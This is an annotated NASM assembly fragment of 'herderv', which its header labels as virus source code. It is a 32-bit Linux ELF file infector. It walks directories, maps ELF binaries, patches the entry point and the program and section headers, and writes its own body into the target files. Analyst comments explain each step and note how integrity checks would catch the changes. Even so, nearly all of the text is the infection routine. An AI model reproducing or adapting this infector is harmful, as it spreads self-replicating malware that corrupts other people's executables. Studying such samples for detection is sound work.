
📄 herderv.asm

📁 此為病毒源碼
              ;-----------------------------------------------------------------------
              ; Analyst notes -- 32-bit x86 Linux, NASM (Intel) syntax, int 0x80 syscalls.
              ;
              ; This listing is a fragment. It opens inside a directory-walk loop whose
              ; start (labels readdir / scan) is outside this view, and the constants
              ; FILE_STACK, STAT_SIZE, MMAP_SIZE, DIRENT_SIZE, HERDERV_SZ, READ_WRITE,
              ; MAP_PRIVATE and SYS_* are defined elsewhere. Comments describe what the
              ; visible instructions do, not whether the sample works as its author
              ; intended.
              ;
              ; check_file
              ;   In:  esi = pointer to a file name
              ;   Flow: open(O_RDWR) -> stat -> mmap(MAP_PRIVATE) -> ELF magic check ->
              ;         cache ELF32 header fields -> edit headers in the mapping ->
              ;         write()/lseek() on the same fd -> munmap -> close.
              ;   Frame slots (offsets from esp after "sub esp,FILE_STACK"):
              ;     FILE_STACK-4   fd                 FILE_STACK-24  e_shoff
              ;     FILE_STACK-8   file size          FILE_STACK-28  e_phnum
              ;     FILE_STACK-12  mapping base       FILE_STACK-32  e_shnum
              ;     FILE_STACK-16  e_entry            FILE_STACK-36  phdr[2].p_filesz
              ;     FILE_STACK-20  e_phoff            FILE_STACK-44  file name pointer
              ;
              ; Header fields this code modifies (what a comparison against a known-good
              ; copy of the binary would show): e_entry, e_shoff, p_filesz/p_memsz of the
              ; segment with p_offset == 0, p_offset of later segments, and sh_size /
              ; sh_offset of affected sections. Any hash baseline or package-manager
              ; verification of the file would be expected to flag the change.
              ;-----------------------------------------------------------------------

              ; --- tail of the directory loop (enclosing routine starts outside this view) ---
              cmp word [esp+10],0x002e  ; [esp+10]=dirent.d_name , 0x002e="." (followed by NUL)
              je skip
              cmp word [esp+10],0x2e2e  ; 0x2e2e=".."
              je skip

              xor eax,eax
              mov al,[esp+DIRENT_SIZE+128+1] ; directory permissions
              add esp,10            ; [esp+10]=dirent.d_name
              push eax              ; needed because we want to access @scan
                                    ; the filename and the write permissions...

              call scan             ; scan is defined outside this view
              add esp,4             ; restore permissions
              sub esp,10            ; restore dirent.d_name

skip:         jmp readdir           ; next directory entry (label outside this view)

;#################### CHECK_FILE #########################################
check_file:
              ; allocate stack memory
              sub esp,FILE_STACK
              mov ebx,esi                   ; ebx = path argument for open()
              mov [esp+FILE_STACK-44],esi   ; pointer to our filename
;################### FOPEN ############################################
fopen:        mov eax,SYS_OPEN
              mov ecx,2                     ; 2=O_RDWR
              mov edx,0                     ; mode argument = 0
              int 0x80

              cmp eax,0
              jg no_err                     ; only a return value > 0 is treated as success
              jmp fopen_error
;#################### NO_ERROR #########################################
no_err:       mov [esp+FILE_STACK-4],eax    ; [esp+50-4]=fd
              ; check file's length (in the stat structure)
              mov eax,SYS_STAT
              mov ebx,esi                   ; esi=filename
              sub esp,STAT_SIZE             ; temporary stat buffer on the stack
              mov ecx,esp
              int 0x80                      ; return value is not examined

              ; storing the file length into eax
              mov eax,[esp+20]              ; [esp+0x14]=filesize
              add esp,STAT_SIZE             ; restore stack
              mov [esp+FILE_STACK-8],eax    ; storing filesize on stack
;#################### MMAP ###############################################
mmap:         ; here we're going to map our file into mem(*see the syntax in
              ; asm/mmap.h)
              mov eax,SYS_MMAP
              mov ecx,[esp+FILE_STACK-8]    ; ecx=file length
              mov edx,[esp+FILE_STACK-4]    ; edx=fd
              sub esp,MMAP_SIZE             ; argument block is built on the stack
              mov dword [esp],0             ; int start
              mov [esp+4],ecx               ; [esp+4]=ecx=file length=int len
              mov dword [esp+8],READ_WRITE  ; prot=READ_WRITE
              mov dword [esp+12],MAP_PRIVATE ; flag=MAP_PRIVATE
              mov dword [esp+16],edx        ; [esp+16]=edx=int fd
              mov dword [esp+20],0          ; offset=0
              mov ebx,esp                   ; ebx=pointer to our
                                            ; mmap_arg_struc - structure
              int 0x80

              add esp,MMAP_SIZE             ; restore stack
              cmp eax,-1                    ; only -1 is treated as failure
              jne ok_mmap
              jmp err_mmap
;#################### OK_MMAP #############################################
ok_mmap:      mov [esp+FILE_STACK-12],eax   ; eax=pointer to the mapped file
;#################### IS_ELF ##############################################
is_elf:       ; check if our mapped file has "ELF" at the beginning of the
              ; file
              mov edx,[esp+FILE_STACK-12]  ; edx=pointer to mapped file
              mov ebx,[edx]                ; first 4 bytes of the file
              mov eax,0x464c457f           ; bytes 7f 45 4c 46 = "\x7fELF" (little-endian dword)
              cmp ebx,eax
              je ok_elf
              jmp no_elf
;################## OK_ELF ###############################################
ok_elf:
;################ READ_EHDR #############################################
read_ehdr:    mov eax,[esp+FILE_STACK-8]  ; file length
              cmp eax,0x130
              jl near err_to_small        ; jmp if(length<0x130)
;############### OK_EHDR ################################################
              ; Offsets below follow the ELF32 header layout.
ok_ehdr:      mov esi,[esp+FILE_STACK-12]
              mov eax,[esi+0x18]
              mov [esp+FILE_STACK-16],eax ; e_entry
              mov eax,[esi+0x1c]
              mov [esp+FILE_STACK-20],eax ; e_phoff
              mov eax,[esi+0x20]
              mov [esp+FILE_STACK-24],eax ; e_shoff
              mov eax,dword [esi+0x2c]
              and eax,0xffff              ; keep the 16-bit field only
              mov [esp+FILE_STACK-28],eax ; e_phnum
              mov eax,dword [esi+0x30]
              and eax,0xffff              ; keep the 16-bit field only
              mov [esp+FILE_STACK-32],eax ; e_shnum
;############## CHK_SPACE #################################################
              ; Program header entries are addressed as 32-byte records; indices 2
              ; and 3 are hard-coded here (the author assumes text and data segments).
chk_space:    mov esi,[esp+FILE_STACK-12]
              mov ebx,[esp+FILE_STACK-20] ; e_phoff
              add esi,ebx                 ; move to first segment of PHDR
              mov ecx,[esi+32*3+8]        ; phdr[3].p_vaddr - FLAGS: RW(data
                                          ; segment ???)
              mov eax,[esi+32*3+16]       ; phdr[3].p_filesz
              mov ebx,[esi+32*2+16]       ; phdr[2].p_filesz
              mov [esp+FILE_STACK-36],ebx ; phdr[2].p_filesz
              mov eax,[esi+32*2+8]        ; phdr[2].p_vaddr - FLAGS: RE(text
                                          ; segment !!!)
              add ebx,[esi+32*2+8]        ; phdr[2].p_filesz + phdr[2].p_vaddr
              sub ecx,ebx                 ; ecx = gap between end of phdr[2] and phdr[3].p_vaddr

              ; if(ecx < HERDERV_SZ ) ...
              mov eax,HERDERV_SZ
              cmp ecx,eax
              jl near err_to_small        ; there is no space where we can
                                          ; write herderv :(

              mov ebx,[esp+FILE_STACK-28] ; e_phnum
              cmp ebx,5
              jl near err_to_small        ; files with fewer than 5 program headers are left alone
              ; From here on the header edits are made in the MAP_PRIVATE mapping;
              ; the file itself is changed later through write() on the fd.
patch_ehdr:   mov ebx,[esp+FILE_STACK-16] ; e_entry
              add ebx,[esp+FILE_STACK-36] ; phdr[2].p_filesz
              mov esi,[esp+FILE_STACK-12] ; ptr to mapped file
              mov [esi+0x18],ebx          ; fix entry point (e_entry field overwritten)
patch_shoff:  add dword [esi+32],HERDERV_SZ ; e_shoff (offset 0x20) += HERDERV_SZ
patch_phdr:   mov ecx,[esp+FILE_STACK-28] ; e_phnum (loop count)
              mov edx,[esp+FILE_STACK-20] ; e_phoff
              mov esi,[esp+FILE_STACK-12] ; ptr to mapped file
              add esi,edx                 ; move to the first seg of PHDR
              mov eax,[esp+FILE_STACK-36] ; phdr[2].p_filesz;off where to
                                          ; insert virus
read_phdr:    cmp dword [esi+4],0         ; is this the .text segment ??? ;
                                          ; p_offset=0=[esi+4]
              jne no_phdrpatch
              add dword [esi+16],HERDERV_SZ ; patching phdr[2].p_filesz
              add dword [esi+20],HERDERV_SZ ; patching phdr[2].p_memsz
no_phdrpatch: cmp eax,[esi+4]

              jg dont_patch_ph              ; skip entries whose p_offset is below the insertion offset
              add dword [esi+4],HERDERV_SZ  ; patching p_offset
dont_patch_ph:
              add esi,0x20                  ; offset to next phdr seg
              loop read_phdr                ; repeats e_phnum times (ecx)
patch_shdr:   mov ecx,[esp+FILE_STACK-32]   ; e_shnum (loop count)
              mov edx,[esp+FILE_STACK-24]   ; e_shoff
              mov esi,[esp+FILE_STACK-12]   ; ptr to mapped file
              add esi,edx                   ; move to first seg of SHDR
              mov eax,[esp+FILE_STACK-36]   ; off where to insert virus ;
                                            ; phdr[2].p_filesz
read_shdr:    mov ebx,[esi+16]              ; sh_offset
              add ebx,[esi+20]              ; sh_size
              cmp ebx,eax                   ; does this section end at the insertion offset?
              jne no_shdrpatch

              ; patching .text section
              add dword [esi+20],HERDERV_SZ ; patching sh_size
no_shdrpatch: cmp [esi+16],eax
              jl dont_patch_sh              ; skip sections that start below the insertion offset
              add dword [esi+16],HERDERV_SZ ; patching sh_offset
dont_patch_sh:
              add esi,40                    ; move to next shdr seg in the
                                            ; SHDR table (40-byte records)
              loop read_shdr                ; repeats e_shnum times (ecx)
own_e_entry:  mov esi,dword [0x8048376]     ; current entry_point
                                            ; (dword read from a hard-coded absolute address)
;################## WRITE_VIRUS ###########################################
write_virus:

              mov eax,[esp+FILE_STACK-4]   ; our old fd
              mov [esp+FILE_STACK-2],eax
              mov ebx,eax                  ; fd

              ; writing the patched ehdr to file
              mov eax,SYS_WRITE            ; write(fd, mapping base, phdr[2].p_filesz)
              mov ecx,[esp+FILE_STACK-12]  ; ptr to our mapped file
              mov edx,[esp+FILE_STACK-36]  ; virus_offset
              int 0x80                     ; hehe ... no more way out.. ;))))

              mov eax,SYS_WRITE            ; write(fd, esi, HERDERV_SZ)
              mov ecx,esi
              mov edx,HERDERV_SZ
              int 0x80

              mov eax,19                   ; lseek()
              mov ecx,[esp+FILE_STACK-36]
              add ecx,HERDERV_SZ
              mov edx,0                    ; SEEK_SET
              int 0x80

              mov ecx,[esp+FILE_STACK-36]
              mov edx,[esp+FILE_STACK-8]   ; file length
              sub edx,ecx                  ; remaining length to write
              mov eax,SYS_WRITE
              add ecx,[esp+FILE_STACK-12]  ; ptr to mapped file

              ; now we must fix the old entry point so that prog can execute
              mov eax,19                   ; lseek(fd, phdr[2].p_filesz + 0x127, SEEK_SET)
              mov ecx,[esp+FILE_STACK-36]
              add ecx,0x127
              mov edx,0
              int 0x80

              add ecx,0x808504
              sub edx,ecx
              push edx                     ; 4-byte value placed on the stack as the write buffer
              mov ecx,esp
              mov edx,4
              mov eax,SYS_WRITE
              int 0x80
              add esp,4                    ; drop the pushed dword

              ; --- cleanup chain: each label falls through into the next ---
err_to_small:
;#################### NO_ELF ##############################################
no_elf:
              mov eax,SYS_MUNMAP
              mov ebx,[esp+FILE_STACK-12] ; ebx=pointer to mapped file
              mov ecx,[esp+FILE_STACK-8]  ; ecx=map length=file length
              int 0x80
;#################### ERR_MMAP ############################################
err_mmap:
              mov eax,SYS_CLOSE
              mov ebx,[esp+FILE_STACK-4]  ; fd saved by no_err
              int 0x80
;#################### FOPEN_ERROR #########################################
fopen_error:
              add esp,FILE_STACK          ; release check_file's frame
              ret
;#################### ERR_READDIR #########################################
              ; --- exit paths of the directory routine (its start is outside this view) ---
err_readdir:  add esp,DIRENT_SIZE   ; restore stack
              mov eax,SYS_CLOSE
              mov ebx,[esp+128+2]   ; fd
              int 0x80

              ; chdir to previous current dir
              mov eax,SYS_CHDIR
              mov ebx,esp           ; path string is read from the start of the frame
              int 0x80

              ;mov eax,dir_err
              ;call print_string
;###################### ERR_STAT & ERR_SCAN ###############################
err_stat:
err_scan:     ;mov eax,scan_e
              ;call print_string
              add esp,134           ; restore stack used for the ##### variables #####

              ret                   ; return to main
;###################### EXIT #############################################
exit:
              mov eax,SYS_EXIT
              int 0x80
